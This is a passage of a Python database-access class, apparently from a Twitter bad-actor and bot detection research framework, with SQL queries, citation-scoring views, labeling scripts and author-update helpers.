fetched_curser[0]\n str_date = str_date_object[0]\n returned_date = self.create_date_from_full_string_date(str_date)\n return returned_date\n\n def get_post_max_date(self):\n query = \"SELECT MAX(posts.date) \" \\\n \"FROM posts\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n fetched_curser = cursor.fetchall()\n str_date_object = fetched_curser[0]\n str_date = str_date_object[0]\n returned_date = self.create_date_from_full_string_date(str_date)\n return returned_date\n\n def create_date_from_full_string_date(self, str_date):\n date_and_hour = str_date.split(\" \")\n str_selected_date = date_and_hour[0]\n year_month_day = str_selected_date.split(\"-\")\n year = int(year_month_day[0])\n month = int(year_month_day[1])\n day = int(year_month_day[2])\n from datetime import date, timedelta as td\n created_date = date(year, month, day)\n return created_date\n\n def get_new_author_screen_names_by_date(self, min_date, current_date):\n\n yesterday = current_date - timedelta(days=1)\n query = \"SELECT DISTINCT posts.author \" \\\n \"FROM posts \" \\\n \"WHERE (posts.url LIKE '%http://twitter.com%' \" \\\n \"OR posts.url LIKE '%https://twitter.com%') \" \\\n \"AND posts.domain = 'Microblog' \" \\\n \"AND posts.date > \" + \"'\" + str(current_date) + \" 00:00:00' \" \\\n \"AND posts.date <= \" + \"'\" + str(\n current_date) + \" 23:59:59' \" \\\n \"and posts.author not in ( \" \\\n \"SELECT DISTINCT posts.author \" \\\n \"FROM posts \" \\\n \"WHERE (posts.url LIKE '%http://twitter.com%' \" \\\n \"OR posts.url LIKE '%https://twitter.com%') \" \\\n \"AND posts.domain = 'Microblog' \" \\\n \"AND posts.date > \" + \"'\" + (\n str(yesterday) if current_date == min_date else str(min_date)) + \" 00:00:00' \" \\\n \"AND posts.date <= \" + \"'\" + str(\n yesterday) + \" 23:59:59' \" \\\n \"GROUP BY author)\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n authors = list(cursor.fetchall())\n author_screen_names = [r[0] for r in authors]\n return author_screen_names\n\n ###########################################################\n # Views creation\n ###########################################################\n def create_uf_view(self):\n '''\n Represents the #references to a post from a given topic\n '''\n self.session.execute(\"DROP VIEW IF EXISTS uf;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS uf AS\\\n SELECT p.post_id_to AS post_id, \\\n p.url_to,\\\n t.max_topic_id AS topic_id,\\\n count(p.post_id_from) AS url_frequency \\\n FROM post_citations p \\\n INNER JOIN \\\n post_topic_mapping t ON (p.post_id_from = t.post_id) \\\n GROUP BY p.post_id_to, \\\n t.max_topic_id\\\n ;\")\n self.session.commit()\n\n def create_tf_view(self):\n '''\n Represents the #topics pointing to a post\n '''\n self.session.execute(\"DROP VIEW IF EXISTS tf;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS tf AS\\\n SELECT uf.post_id,\\\n count(uf.topic_id) AS topic_frequency \\\n FROM uf\\\n GROUP BY uf.post_id\\\n ;\")\n self.session.commit()\n\n def create_total_url_frequency_view(self):\n '''\n Represents #references to a post overall\n '''\n self.session.execute(\"DROP VIEW IF EXISTS total_url_frequency;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS total_url_frequency AS\\\n SELECT uf.post_id,\\\n sum(uf.url_frequency) AS tof\\\n FROM uf \\\n GROUP BY uf.post_id;\\\n \")\n self.session.commit()\n\n def create_topic_stats_view(self):\n '''\n Represents how many references is available from each topic\n '''\n self.session.execute(\"DROP VIEW IF EXISTS topic_stats;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS topic_stats as \\\n SELECT max_topic_id AS topic_id, count(post_id) as post_count \\\n FROM post_topic_mapping \\\n GROUP BY max_topic_id \\\n \")\n self.session.commit()\n\n def create_tfidf_view(self):\n self.session.execute(\"DROP VIEW IF EXISTS tfidf;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS tfidf AS \\\n SELECT uf.post_id,\\\n uf.topic_id,\\\n uf.url_to,\\\n uf.url_frequency AS how_many_times_cited_in_topic,\\\n tf.topic_frequency AS in_how_many_topics,\\\n topic_stats.post_count,\\\n 1.0 * uf.url_frequency / topic_stats.post_count * log(1.0 * (select count(*) from topics) / tf.topic_frequency) AS ufitf1,\\\n tuf.tof\\\n FROM uf\\\n INNER JOIN\\\n tf ON (uf.post_id = tf.post_id) \\\n INNER JOIN \\\n topic_stats ON (uf.topic_id = topic_stats.topic_id) \\\n INNER JOIN\\\n total_url_frequency tuf ON (tuf.post_id = uf.post_id);\\\n \")\n self.session.commit()\n\n def create_key_posts_view(self):\n self.session.execute(\"DROP VIEW IF EXISTS export_key_posts;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS export_key_posts AS \\\n SELECT p.post_id, \\\n p.guid,\\\n p.url as url, \\\n max(pr.tfidf) AS tfidf1 \\\n FROM posts p \\\n INNER JOIN posts_representativeness pr on (pr.post_id = p.post_id)\\\n GROUP BY p.post_id,\\\n p.guid, \\\n p.url;\")\n\n def create_key_authors_view(self):\n self.session.execute(\"DROP VIEW IF EXISTS export_key_authors;\")\n self.session.execute(\"CREATE VIEW IF NOT EXISTS export_key_authors AS \\\n SELECT p.author AS author_name,\\\n p.author_guid,\\\n SUM(r.tfidf1) AS SumTFIDF,\\\n MAX(r.tfidf1) AS MaxTFIDF\\\n FROM posts p \\\n JOIN \\\n export_key_posts r ON (r.post_id = p.post_id)\\\n where author_guid is not null and r.tfidf1 is not null\\\n GROUP BY p.author_guid\")\n\n def create_author_post_cite_view(self):\n self.session.execute(\"DROP VIEW IF EXISTS author_post_cite;\")\n query = text(\"CREATE VIEW IF NOT EXISTS author_post_cite as \\\n SELECT DISTINCT posts.author_guid, post_citations.post_id_to \\\n FROM posts \\\n\t INNER JOIN post_citations ON(post_citations.post_id_from = posts.post_id) \\\n\t WHERE posts.author_guid is not null\")\n self.session.execute(query)\n self.session.commit()\n\n def get_authors_topics(self, domain, min_posts_count):\n query = \"\"\"\n SELECT author_topic_mapping.*\n FROM author_topic_mapping\n INNER JOIN author_guid_num_of_posts_view ON (author_guid_num_of_posts_view.author_guid = author_topic_mapping.author_guid)\n WHERE author_guid_num_of_posts_view.num_of_posts >= :min_posts_count\n AND domain = :domain\n \"\"\"\n result = self.session.execute(query, params=dict(domain=domain, min_posts_count=min_posts_count))\n cursor = result.cursor\n author_topics_vectors = self.result_iter(cursor)\n\n author_guid_topics_vector = self._create_author_guid_topics_vector(author_topics_vectors)\n return author_guid_topics_vector\n\n def get_random_authors_topics(self, domain, min_posts_count):\n query = \"\"\"\n SELECT author_topic_mapping.*\n FROM author_topic_mapping\n INNER JOIN random_authors_for_graphs ON (random_authors_for_graphs.author_guid = author_topic_mapping.author_guid)\n \"\"\"\n result = self.session.execute(query, params=dict(domain=domain, min_posts_count=min_posts_count))\n cursor = result.cursor\n author_topics_vectors = self.result_iter(cursor)\n\n author_guid_topics_vector = self._create_author_guid_topics_vector(author_topics_vectors)\n return author_guid_topics_vector\n\n def _create_author_guid_topics_vector(self, author_topics_vectors):\n author_guid_topics_vector = {}\n for author_topics_vector in author_topics_vectors:\n author_guid = author_topics_vector[0]\n author_topic_vector = author_topics_vector[1:-1]\n\n author_guid_topics_vector[author_guid] = author_topic_vector\n return author_guid_topics_vector\n\n def create_author_guid_num_of_posts_view(self):\n self.session.execute(\"DROP VIEW IF EXISTS author_guid_num_of_posts_view;\")\n query = \"\"\"\n CREATE VIEW author_guid_num_of_posts_view as\n SELECT posts.author_guid, posts.domain, COUNT(*) as num_of_posts\n FROM posts\n GROUP BY 1,2\n HAVING num_of_posts >= 1\n ORDER BY 3 DESC\n \"\"\"\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_posts_count_per_author(self, domain):\n query = text(\"SELECT authors.author_guid, COUNT(posts.post_id) \"\n \"FROM authors \"\n \"INNER JOIN posts ON (authors.author_guid = posts.author_guid) \"\n \"WHERE authors.domain = :domain and authors.author_osn_id IS NOT NULL \"\n \"GROUP BY authors.author_guid\")\n\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n records = list(cursor.fetchall())\n return {record[0]: record[1] for record in records}\n\n #############################################################\n ###### Co-Citations View\n #############################################################\n def get_cocitations(self, min_number_of_cocited_posts):\n query = \" SELECT a1.author_guid, a2.author_guid, count(a1.post_id_to) AS weight \\\n FROM author_post_cite a1 \\\n INNER JOIN author_post_cite a2 ON (a1.post_id_to = a2.post_id_to) \\\n WHERE a1.author_guid <> a2.author_guid \\\n GROUP BY a1.author_guid, a2.author_guid \\\n HAVING weight >= :min_number_of_cocited_posts \"\n\n print('starting get_cocitations query execution')\n result = self.session.execute(query, params=dict(min_number_of_cocited_posts=min_number_of_cocited_posts))\n print('passed get_cocitations query execution')\n\n cursor = result.cursor\n print('starting get_cocitations cursor fetchall')\n rows = self.result_iter(cursor)\n print('passed get_cocitations cursor fetchall')\n return rows\n\n ###########################################################\n ####### Citations View\n ###########################################################\n def get_citations(self, domain):\n query = \" SELECT p_from.author_guid AS from_author_guid, p_to.author_guid AS to_author_guid, count(*) AS num_citations \\\n FROM post_citations AS p_cit \\\n INNER JOIN posts AS p_from ON (p_cit.post_id_from = p_from.post_id) \\\n INNER JOIN posts AS p_to ON (p_cit.post_id_to = p_to.post_id) \\\n WHERE p_from.domain = :domain \\\n AND p_to.domain = :domain \\\n GROUP BY from_author_guid, to_author_guid \"\n\n print('starting get_citations query execution')\n result = self.session.execute(query, params=dict(domain=domain))\n print('passed get_citations query execution')\n\n cursor = result.cursor\n print('starting get_citations cursor fetchall')\n rows = list(cursor.fetchall())\n print('passed get_citations cursor fetchall')\n return rows\n\n def get_random_author_guid_post_id_dictionary(self):\n query = \"\"\"\n SELECT posts.author_guid, posts.post_id\n FROM posts\n INNER JOIN random_authors_for_graphs on random_authors_for_graphs.author_guid = posts.author_guid\n \"\"\"\n return self._create_dictionary_by_query(query)\n\n def _create_dictionary_by_query(self, query):\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n records = self.result_iter(cursor)\n records = list(records)\n return {record[0]: record[1] for record in records}\n\n def get_post_id_random_author_guid_dictionary(self):\n\n query = \"\"\"\n SELECT posts.post_id, posts.author_guid\n FROM posts\n INNER JOIN random_authors_for_graphs on random_authors_for_graphs.author_guid = posts.author_guid\n \"\"\"\n return self._create_dictionary_by_query(query)\n\n ###########################################################\n # post representativeness\n ###########################################################\n def load_posts_representativeness_table(self):\n ufitf_data = self.get_ufitf_data()\n self.session.add_all(ufitf_data)\n self.session.commit()\n\n def create_posts_representativeness_entry(self, ufitf_value):\n return Posts_representativeness(\n post_id=format(list(ufitf_value.values())[0]),\n topic_id=int(list(ufitf_value.values())[1]),\n url=format(list(ufitf_value.values())[2]),\n how_many_times_cited_in_topic=int(list(ufitf_value.values())[3]),\n in_how_many_topics=int(list(ufitf_value.values())[4]),\n post_count=int(list(ufitf_value.values())[5]),\n tfidf=float(list(ufitf_value.values())[6]),\n tof=int(list(ufitf_value.values())[7]),\n )\n\n def get_ufitf_data(self):\n q = text(\n \"select post_id, topic_id, url_to, how_many_times_cited_in_topic, in_how_many_topics, post_count, ufitf1, tof from tfidf\")\n res = self.session.execute(q)\n return [self.create_posts_representativeness_entry(r) for r in res]\n\n def get_already_crawled_author_ids(self):\n query = \"SELECT DISTINCT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_osn_id IS NOT NULL \" \\\n \"AND authors.missing_data_complementor_insertion_date IS NOT NULL\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = list(cursor.fetchall())\n already_crawled_author_ids = [r[0] for r in ids]\n return already_crawled_author_ids\n\n def get_bad_actor_retweeters_not_retrieved_from_vico(self):\n logging.info(\"get_bad_actor_retweeters_not_retrieved_from_vico\")\n\n query = \"SELECT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"INNER JOIN post_retweeter_connections on (authors.author_osn_id = post_retweeter_connections.retweeter_twitter_id) \" \\\n \"WHERE authors.xml_importer_insertion_date IS NULL \" \\\n \"AND authors.protected = 0 \" \\\n \"AND authors.author_type = 'bad_actor'\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = list(cursor.fetchall())\n twitter_authors_ids = [r[0] for r in ids]\n logging.info(\"Number of bad actor retweeters not retrieved from vico is: \" + str(len(twitter_authors_ids)))\n return twitter_authors_ids\n\n def get_bad_actors_retweets_retrieved_by_vico(self):\n logging.info(\"get_bad_actors_retweets_retrieved_by_vico\")\n\n results = self.session.query(Post).filter(or_(Post.content.like(\"%RT @annakiril3%\"),\n Post.content.like(\"%RT @LeviAvavilevi%\"),\n Post.content.like(\"%RT @benny_metanya%\"),\n Post.content.like(\"%RT @meggiewill5%\"),\n Post.content.like(\"%RT @amira_buzavgo%\"),\n Post.content.like(\"%RT @TAringthon%\"))).all()\n\n return results\n\n def get_bad_actor_tweets_from_vico(self):\n logging.info(\"get_bad_actor_tweets_from_vico\")\n '''\n SELECT *\n FROM posts\n WHERE (posts.content LIKE '%Youtube apps joins free Online TV channel in United kingdom%'\n OR posts.content LIKE '%Watch Internet TV, and Online TV for free!!%'\n OR posts.content LIKE '%Smart TV - all what we need to know!%'\n OR posts.content LIKE '%How to Stream Web Videos & Live TV to a Samsung Smart TV%'\n OR posts.content LIKE '%Free Internet TV - A Complete Guide For Canadians%'\n OR posts.content LIKE '%Smart TV vs. Media Streamer%' )\n AND posts.content NOT LIKE '%RT @%'\n '''\n\n results = self.session.query(Post).filter(\n or_(Post.content.like('%Youtube apps joins free Online TV channel in United kingdom%'),\n Post.content.like('%Watch Internet TV, and Online TV for free!!%'),\n Post.content.like('%Smart TV - all what we need to know!%'),\n Post.content.like('%How to Stream Web Videos & Live TV to a Samsung Smart TV%'),\n Post.content.like('%Free Internet TV - A Complete Guide For Canadians%'),\n Post.content.like('%Smart TV vs. Media Streamer%')),\n and_(not_(Post.content.like('%RT @%')))).all()\n\n return results\n\n def get_missing_authors_guid_not_marked_as_bad_actors(self, targeted_twitter_author_screen_names):\n #\n # This function retrieved all the authors who retweeted our posts and they are not marked as bad actors\n #\n\n logging.info(\"get_bad_actor_retweeters_not_retrieved_from_vico\")\n\n query = \"SELECT authors.author_guid \" \\\n \"FROM authors \" \\\n \"INNER JOIN posts ON (authors.author_guid = posts.author_guid) \" \\\n \"WHERE (posts.content LIKE '%RT @annakiril3%' \" \\\n \"OR posts.content LIKE '%RT @LeviAvavilevi%' \" \\\n \"OR posts.content LIKE '%RT @benny_metanya%' \" \\\n \"OR posts.content LIKE '%RT @meggiewill5%' \" \\\n \"OR posts.content LIKE '%RT @amira_buzavgo%' \" \\\n \"OR posts.content LIKE '%RT @TAringthon%') \" \\\n \"AND authors.author_type IS NOT 'bad_actor'\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n twitter_author_guids = list(cursor.fetchall())\n author_guids = [r[0] for r in twitter_author_guids]\n logging.info(\"Number of missing bad actors that were not marked is: \" + str(len(author_guids)))\n return author_guids\n\n def delete_acquired_authors(self):\n logging.info(\"delete_acquired_authors\")\n query = 'DELETE ' \\\n 'FROM authors ' \\\n 'WHERE authors.author_type = \"bad_actor\" ' \\\n 'AND (authors.author_sub_type = \"crowdturfer\" ' \\\n 'OR authors.author_sub_type IS NULL ' \\\n 'OR authors.author_sub_type = \"acquired\")'\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def delete_manually_labeled_authors(self):\n logging.info(\"delete_manually_labeled_authors\")\n query = 'DELETE ' \\\n 'FROM authors ' \\\n 'WHERE (authors.author_type = \"bad_actor\" OR authors.author_type = \"good_actor\")'\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def delete_posts_with_missing_authors(self):\n logging.info(\"detele_posts_with_missing_authors\")\n query = ' DELETE ' \\\n ' FROM posts' \\\n ' WHERE (posts.author_guid NOT IN( ' \\\n ' SELECT authors.author_guid' \\\n ' FROM authors) ' \\\n ' OR posts.author_guid IS NULL) '\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_posts_of_missing_authors(self):\n\n results = self.session.query(Post).filter(Post.author_guid == None).all()\n return results\n\n def get_missing_authors_tuples(self):\n query = ' SELECT DISTINCT(posts.author_guid), posts.author' \\\n ' FROM posts' \\\n ' WHERE (posts.author_guid NOT IN( ' \\\n ' SELECT authors.author_guid' \\\n ' FROM authors) ' \\\n ' OR posts.author_guid IS NULL) '\n\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n return tuples\n\n def get_author_screen_name_last_post_id(self):\n query = '''\n SELECT a.author_screen_name, p.post_osn_id, MIN(p.date) \n FROM authors a, posts p\n WHERE a.author_guid = p.author_guid\n GROUP BY a.author_guid\n '''\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n author_screen_names_post_ids = list(cursor.fetchall())\n # return cursor\n return self._get_author_screen_name_tweet_id_dict(author_screen_names_post_ids)\n\n def get_author_screen_name_first_post_id(self):\n query = '''\n SELECT a.author_screen_name, p.post_osn_id, MAX(p.date) \n FROM authors a, posts p\n WHERE a.author_guid = p.author_guid\n GROUP BY a.author_guid\n '''\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n author_screen_names_post_ids = list(cursor.fetchall())\n # return cursor\n return self._get_author_screen_name_tweet_id_dict(author_screen_names_post_ids)\n\n def _get_author_screen_name_tweet_id_dict(self, author_screen_names_post_ids):\n author_screen_name_tweet_id = {}\n for author_screen_name, post_osn_id, date in author_screen_names_post_ids:\n author_screen_name_tweet_id[author_screen_name] = post_osn_id\n return author_screen_name_tweet_id\n\n def get_author_screen_names_and_number_of_posts(self, num_of_minimal_posts):\n\n logging.info(\"get_author_screen_names_for_timelines\")\n\n query = \"SELECT authors.author_screen_name, COUNT(authors.author_guid) \" \\\n \"FROM authors \" \\\n \"INNER JOIN posts ON(authors.author_guid = posts.author_guid) \" \\\n \"WHERE authors.domain = 'Microblog' \" \\\n \"AND authors.author_osn_id IS NOT NULL \" \\\n \"AND authors.protected = 0 \" \\\n \"AND authors.timeline_overlap_insertion_date IS NULL \" \\\n \"GROUP BY authors.author_guid \" \\\n \"HAVING COUNT(authors.author_guid) < :num_of_minimal_posts\"\n\n query = text(query)\n result = self.session.execute(query, params=dict(num_of_minimal_posts=num_of_minimal_posts))\n cursor = result.cursor\n # return cursor\n osn_author_screen_names_and_number_of_posts = list(cursor.fetchall())\n return osn_author_screen_names_and_number_of_posts\n\n def assign_manually_labeled_authors(self):\n self.assign_private_profiles()\n self.assign_company_profiles()\n self.assign_bot_profiles()\n self.assign_news_feed_profiles()\n self.assign_spammer_profiles()\n\n def assign_private_profiles(self):\n logging.info(\"assign_private_profiles\")\n sql_script = open('DB/scripts/assign_private_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_company_profiles(self):\n logging.info(\"assign_company_profiles\")\n sql_script = open('DB/scripts/assign_company_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_news_feed_profiles(self):\n logging.info(\"assign_news_feed_profiles\")\n sql_script = open('DB/scripts/assign_news_feed_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_spammer_profiles(self):\n logging.info(\"assign_spammer_profiles\")\n sql_script = open('DB/scripts/assign_spammer_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_bot_profiles(self):\n logging.info(\"assign_bot_profiles\")\n sql_script = open('DB/scripts/assign_bot_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_crowdturfer_profiles(self):\n logging.info(\"assign_crowdturfer_profiles\")\n sql_script = open('DB/scripts/assign_crowdturfer_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def assign_acquired_profiles(self):\n logging.info(\"assign_acquired_profiles\")\n sql_script = open('DB/scripts/assign_acquired_profiles.txt', 'r')\n query = sql_script.read()\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_all_acquired_crowdturfer_authors(self):\n logging.info(\"get_all_acquired_crowdturfer_authors\")\n query = 'SELECT * ' \\\n 'FROM authors ' \\\n 'WHERE (authors.author_type = \"bad_actor\" ' \\\n 'AND (authors.author_sub_type = \"acquired\" OR authors.author_sub_type = \"crowdturfer\" OR authors.author_sub_type IS NULL));'\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n data = list(cursor.fetchall())\n authors = [row[0] for row in data]\n return authors\n\n def get_all_manually_labeled_bad_actors(self):\n logging.info(\"get_all_manually_labeled_bad_actors\")\n query = 'SELECT * ' \\\n 'FROM authors ' \\\n 'WHERE (authors.author_type = \"bad_actor\" ' \\\n 'AND authors.author_sub_type IS NOT NULL);'\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n data = list(cursor.fetchall())\n authors = [row[0] for row in data]\n return authors\n\n def get_all_unlabeled_authors(self):\n logging.info(\"get_all_unlabeled_authors\")\n query = \"SELECT * \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_type IS NULL \" \\\n \"AND authors.domain = 'Microblog'\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n data = list(cursor.fetchall())\n authors = [row[0] for row in data]\n return authors\n\n def update_bad_actor_from_timeline_overlaping(self, potential_bad_actors):\n logging.info(\"update_bad_actor_from_timeline_overlaping\")\n query = 'UPDATE authors ' \\\n 'SET author_type = \"bad_actor\", author_sub_type = \"acquired\", timeline_overlap_insertion_date = :insertion_date ' \\\n 'WHERE authors.name IN ' + \"('\" + \"','\".join(map(str, potential_bad_actors)) + \"')\"\n query = text(query)\n date = str(get_current_time_as_string())\n self.session.execute(query, params=dict(insertion_date=date))\n self.session.commit()\n\n def update_authors_type_by_author_names(self, authors_name, author_type):\n logging.info(\"update_authors_type_by_author_names\")\n query = 'UPDATE authors ' \\\n 'SET author_type = :author_type ' \\\n 'WHERE authors.name IN ' + \"('\" + \"','\".join(map(str, authors_name)) + \"')\"\n query = text(query)\n self.session.execute(query, params=dict(author_type=author_type))\n self.session.commit()\n\n def create_authors_index(self):\n logging.info(\"create_authors_index\")\n query = \"CREATE INDEX IF NOT EXISTS idx_authors \" \\\n \"ON authors (domain, author_osn_id)\"\n\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def create_posts_index(self):\n logging.info(\"create_authors_index\")\n query = \"CREATE INDEX IF NOT EXISTS idx_posts \" \\\n \"ON posts (author_guid)\"\n\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_words_with_highest_probability(self):\n query = \"select * \" \\\n \"from topic_terms_view \" \\\n \"order by topic_id asc,probability desc ;\"\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n data = list(cursor.fetchall())\n result = {}\n current_topic = str(data[0][0])\n get_from_topic = 0\n for row in data:\n\n if str(row[0]) != current_topic:\n get_from_topic = 0\n current_topic = str(row[0])\n\n if current_topic not in result:\n result[current_topic] = []\n\n if str(row[0]) == current_topic and get_from_topic <= 10:\n get_from_topic += 1\n result[current_topic].append((row[1], row[2]))\n\n return result\n\n def get_author_timelines_by_min_num_of_posts(self, domain, min_num_of_posts):\n query = \"\"\"\n select\n a.author_guid,\n p.content,\n a.author_type\n from authors as a\n inner join posts as p on (a.author_guid = p.author_guid)\n where a.domain= :domain\n and a.author_guid in ( select\n posts.author_guid\n from posts\n where domain = :domain\n group by posts.author_guid\n having count(posts.author_guid) >= :min_num_of_posts)\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query, params=dict(domain=domain, min_num_of_posts=min_num_of_posts))\n cursor = result.cursor\n tuples = self.result_iter(cursor)\n return tuples\n\n def get_author_connections_by_connection_type(self, connection_type):\n query = \"\"\"\n SELECT author_connections.source_author_guid, author_connections.destination_author_guid, author_connections.weight\n FROM author_connections\n WHERE author_connections.connection_type = :connection_type\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query, params=dict(connection_type=connection_type))\n cursor = result.cursor\n generator = self.result_iter(cursor)\n return generator\n\n def get_labeled_authors_by_domain(self, domain, targeted_class_field_name):\n query = \"\"\"\n SELECT authors.author_guid, authors.{}\n FROM authors\n WHERE authors.domain = domain\n AND authors.author_type IS NOT NULL\n \"\"\".format(targeted_class_field_name)\n query = text(query)\n\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n generator = self.result_iter(cursor)\n return generator\n\n def get_labeled_author_connections_by_connection_type(self, connection_type):\n query = \"\"\"\n SELECT author_connections.source_author_guid, author_connections.destination_author_guid, author_connections.weight\n FROM author_connections\n INNER JOIN authors as a1 ON (a1.author_guid = author_connections.source_author_guid)\n INNER JOIN authors as a2 ON (a2.author_guid = author_connections.destination_author_guid )\n WHERE author_connections.connection_type = :connection_type\n AND a1.author_type IS NOT NULL\n AND a2.author_type IS NOT NULL\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query, params=dict(connection_type=connection_type))\n cursor = result.cursor\n generator = self.result_iter(cursor)\n return generator\n\n return cursor\n\n def get_labeled_bad_actors_timelines_temp(self):\n query = \"\"\" select\n a.name,\n p.content,\n a.author_sub_type\n from\n authors as a\n inner join\n posts as p on (a.author_guid = p.author_guid)\n where\n a.domain= 'Microblog'\n and (a.author_type = 'bad_actor' or a.author_type = 'good_actor')\n and a.author_sub_type in ('bot','spammer','crowdturfer','acquired','news_feed','private','company' )\n and a.author_guid in ( select\n posts.author_guid\n from posts\n where domain = 'Microblog'\n group by posts.author_guid\n having count(posts.author_guid) >= 100)\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query)\n cursor = result.cursor\n\n return cursor\n\n def get_authors_and_tweets_ids_from_temporal_table(self):\n '''\n :return: a list of Twitter statuses id\n '''\n\n q = \" select post_id, author_id from ( \"\n for i in range(3, 203):\n q += \"select field\" + str(i) + \" as post_id, twitter_id as author_id from honeypot where field\" + str(\n i) + \" is not null \\n \"\n if i < 202:\n q += \" union \"\n q += \") \\n \"\n q += \" where post_id not in (select post_osn_id from posts) \" \\\n \" and post_id not in (select tweet_id from deleted_tweets) \" \\\n \" and author_id not in (select author_osn_id from authors where protected = 1 or is_suspended_or_not_exists = 1)\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n result = []\n for rec in records:\n result.append((rec[0], rec[1]))\n\n return result\n\n def save_author_features(self, authors_features):\n print('\\n Beginning merging author_features objects')\n counter = 0\n if authors_features:\n for author_features_row in authors_features:\n counter += 1\n self.update_author_features(author_features_row)\n if counter == 100:\n print(\"\\r \" + \"merging author-features objects\", end=\"\")\n self.commit()\n counter = 0\n if counter != 0:\n self.commit()\n print('Finished merging author_features objects')\n\n def create_topic_terms_view(self):\n print(\"create_topic_terms_view \")\n query = \"\"\"\n create view IF NOT EXISTS topic_terms_view as\n\t\t select topic_id, t2.description, probability\n from topics t1 inner join terms t2 on t1.term_id = t2.term_id\n \"\"\"\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n def get_cooperated_authors(self, targeted_twitter_author_names, domain):\n query = \"\"\"\n SELECT DISTINCT authors.author_guid\n FROM authors\n INNER JOIN posts ON (authors.author_guid = posts.author_guid)\n WHERE authors.domain = :domain\n AND authors.author_type IS NOT 'bad_actor'\n AND ( \"\"\"\n\n targeted_twitter_authors_count = len(targeted_twitter_author_names)\n query += \"posts.content LIKE '%RT @\" + targeted_twitter_author_names[0] + \"%' \"\n\n for i in range(1, targeted_twitter_authors_count):\n query += \"OR posts.content LIKE '%RT @\" + targeted_twitter_author_names[i] + \"%' \"\n\n query += \")\"\n\n query = text(query)\n\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n\n return cursor\n\n def create_post_topic_mapping_post_id_index(self):\n logging.info(\"create_post_topic_mapping_post_id_index\")\n query = \"CREATE INDEX IF NOT EXISTS create_post_topic_mapping_post_id_index \" \\\n \"ON post_topic_mapping (post_id)\"\n\n def create_posts_post_id_index(self):\n logging.info(\"create_posts_post_id_index\")\n query = \"CREATE INDEX IF NOT EXISTS create_posts_post_id_index \" \\\n \"ON posts (posts)\"\n\n def get_unlabeled_predictions(self):\n query = \"\"\"\n SELECT unlabeled_predictions.AccountPropertiesFeatureGenerator_author_screen_name,\n unlabeled_predictions.predicted,\n unlabeled_predictions.prediction\n FROM unlabeled_predictions\n \"\"\"\n query = text(query)\n\n result = self.session.execute(query)\n cursor = result.cursor\n\n return cursor\n\n def drop_unlabeled_predictions(self, predictions_table_name):\n query = \"DROP TABLE IF EXISTS \" + predictions_table_name + \";\"\n query = text(query)\n self.session.execute(query)\n self.session.commit()\n\n ###########################################################\n ####### Get distance features\n ###########################################################\n\n def get_distance_features(self):\n query = \" SELECT author_guid \\\n FROM author_features \\\n WHERE attribute_name like '%min_dist_to%' \\\n or attribute_name like '%mean_dist_to%' \"\n\n result = self.session.execute(query)\n cursor = result.cursor\n rows = list(cursor.fetchall())\n return rows\n\n def insert_or_update_authors_from_posts(self, domain, author_classify_dict, author_prop_dict):\n authors_to_update = []\n posts = self.session.query(Post).filter(Post.domain == domain).all()\n author_dict = self.get_author_dictionary()\n logging.info(\"Insert or update_authors from app importer\")\n logging.info(\"total Posts: \" + str(len(posts)))\n i = 1\n for post in posts:\n msg = \"\\r Insert or update posts: [{}\".format(i) + \"/\" + str(len(posts)) + ']'\n print(msg, end=\"\")\n i += 1\n author_guid = post.author_guid\n if author_guid in author_dict:\n continue\n\n # domain = post.domain\n\n # if not self.is_author_exists(author_guid, domain):\n author = Author()\n author_name = post.author\n author.name = author_name\n author.author_screen_name = post.author\n author.domain = post.domain\n author.author_guid = author_guid\n\n if author_name in author_classify_dict:\n author.author_type = 